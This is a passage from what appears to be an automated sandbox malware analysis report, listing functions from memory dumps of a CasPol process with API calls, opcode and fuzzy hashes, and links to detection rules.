                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 5731c1238c373b5d258ab369947e44a39ec065c9ba3c0f356f126f761e52bf5e
                                                                                    • Instruction ID: 79657055d8bcaa471601f2309d302ab812eb7f22589142f8c10a9f869631cc6e
                                                                                    • Opcode Fuzzy Hash: 5731c1238c373b5d258ab369947e44a39ec065c9ba3c0f356f126f761e52bf5e
                                                                                    • Instruction Fuzzy Hash: 9211F0B5C007498FCB14CF9AD444B9EFBF5EB89214F14881AD929B7700C3B5A545CFA6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5B5349 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 1D5B53B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 3c8cac4629f30d9fce0c265b47c59bc906fbdf92b6ad9b951301d74d8687b5a2
                                                                                    • Instruction ID: 199196f45a36763fd907412bea1b99aa0499b336655e15f40cc05db171eea56c
                                                                                    • Opcode Fuzzy Hash: 3c8cac4629f30d9fce0c265b47c59bc906fbdf92b6ad9b951301d74d8687b5a2
                                                                                    • Instruction Fuzzy Hash: 4E11F0B5C002498FCB14CF9AD444BDEFBF5EF89214F14881AD869B7600C375A545CFA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01086FE8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 01087EA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733751864.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1080000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 11bfb459b7dc4fa36bc1a861ac36e8e64ff4697a4a7136e7665348bff72b618c
                                                                                    • Instruction ID: 3f456fe07443d48549701c5d97e69808f1434a2dd6a8b1e93f1623683dc29fae
                                                                                    • Opcode Fuzzy Hash: 11bfb459b7dc4fa36bc1a861ac36e8e64ff4697a4a7136e7665348bff72b618c
                                                                                    • Instruction Fuzzy Hash: EC1103B48042488FCB10DF99D448B9EFBF4EB88324F24845ADA58B7640C374A944CBA6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01087E49 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 01087EA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733751864.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1080000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 5492cdad9b2452ec2227df086c627e7a834acff8efc3fcbb9e32fe624fb4d74c
                                                                                    • Instruction ID: 460e96091fd3eea7e677bdc5ec9761bf0a72efa122451f705549a9b19365b4f0
                                                                                    • Opcode Fuzzy Hash: 5492cdad9b2452ec2227df086c627e7a834acff8efc3fcbb9e32fe624fb4d74c
                                                                                    • Instruction Fuzzy Hash: 691115B5C142488FCB10CF99D444BDEFFF4EB88324F24845AD958A7650C338A944CFA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5B5321 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 1D5B53B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 9ec1589e8d311c26aedc5cce69bef2ccb2cc6ba6eaae7531207acc329f33f709
                                                                                    • Instruction ID: aa9b32b526d8a09b093bd9c198263f67abe5a313880f62528ad788eba3c55ce1
                                                                                    • Opcode Fuzzy Hash: 9ec1589e8d311c26aedc5cce69bef2ccb2cc6ba6eaae7531207acc329f33f709
                                                                                    • Instruction Fuzzy Hash: 531106B18007498ECB08CF5AD4007DEFBF1AF89318F25899EC059A7212C375A146CFA6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D45D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19757623966.000000001D45D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d45d000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b47f131af4ab53922527558df68aedfb2e2524bc9f347100899157d88fd99104
                                                                                    • Instruction ID: 629a4518a601b2fa5d16b99fb1d9b09779102cd3e083ba1d413a13f227cf757a
                                                                                    • Opcode Fuzzy Hash: b47f131af4ab53922527558df68aedfb2e2524bc9f347100899157d88fd99104
                                                                                    • Instruction Fuzzy Hash: D4210375504244DFDB05CF18D9C0B16BB65FF88324F24C569D9895B306C336E857CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D46D01C Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19757744629.000000001D46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D46D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d46d000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 257c863549f2846ff47c13b38d3a30159d3fa8ee1ad076c4a430172ae9838b9f
                                                                                    • Instruction ID: d2040bc6b89213a101e14dece8bdf77243b7204074521997d90dd12ea40826c9
                                                                                    • Opcode Fuzzy Hash: 257c863549f2846ff47c13b38d3a30159d3fa8ee1ad076c4a430172ae9838b9f
                                                                                    • Instruction Fuzzy Hash: 5E21D074608240DFDB05CF28D880B16BBA5FB88718F34C569D98A4B346C336D887CAB2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D46D006 Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19757744629.000000001D46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D46D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d46d000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9093547da15654150a5c08e9e5c0b381164bddb21de97686ba805021e405080f
                                                                                    • Instruction ID: b791cdd39851d599187696a0dec8355da76fbd91a0ceff4fccc9f62cef7c6ab3
                                                                                    • Opcode Fuzzy Hash: 9093547da15654150a5c08e9e5c0b381164bddb21de97686ba805021e405080f
                                                                                    • Instruction Fuzzy Hash: CE216F755083849FC702CF14D994B11BF71EF46318F24C5AAD8898B296C33AD85ACBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D45D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19757623966.000000001D45D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d45d000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17177156bcdf4fb627a2d91eb7e70b3a7e51356c61ee15ef531a636ed26fe6d3
                                                                                    • Instruction ID: a0f4d62d8fa713a2aaf5bdb8d74f8b0deb00615e64ff3105fa8007d0fc9e4726
                                                                                    • Opcode Fuzzy Hash: 17177156bcdf4fb627a2d91eb7e70b3a7e51356c61ee15ef531a636ed26fe6d3
                                                                                    • Instruction Fuzzy Hash: C511AC76504280DFDB02CF14D9C0B16BF72FF85324F24C6A9D8490B61AC33AE45ACBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0100F388 Relevance: .2, Instructions: 196COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0a46473c4d5bfabcd8f14494663bf936bf7e8dec792fa88f916e2ff0a00b905f
                                                                                    • Instruction ID: 1900a0d0d940b5cf41c1ff9a1366bc6882c28fe2dfca5c01e5aaae8c8ba768ea
                                                                                    • Opcode Fuzzy Hash: 0a46473c4d5bfabcd8f14494663bf936bf7e8dec792fa88f916e2ff0a00b905f
                                                                                    • Instruction Fuzzy Hash: 7B5117303045258FEB2A5B79889867D3BD6EFC5651B1A44A9E643CB3D0DF36CC02D792
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%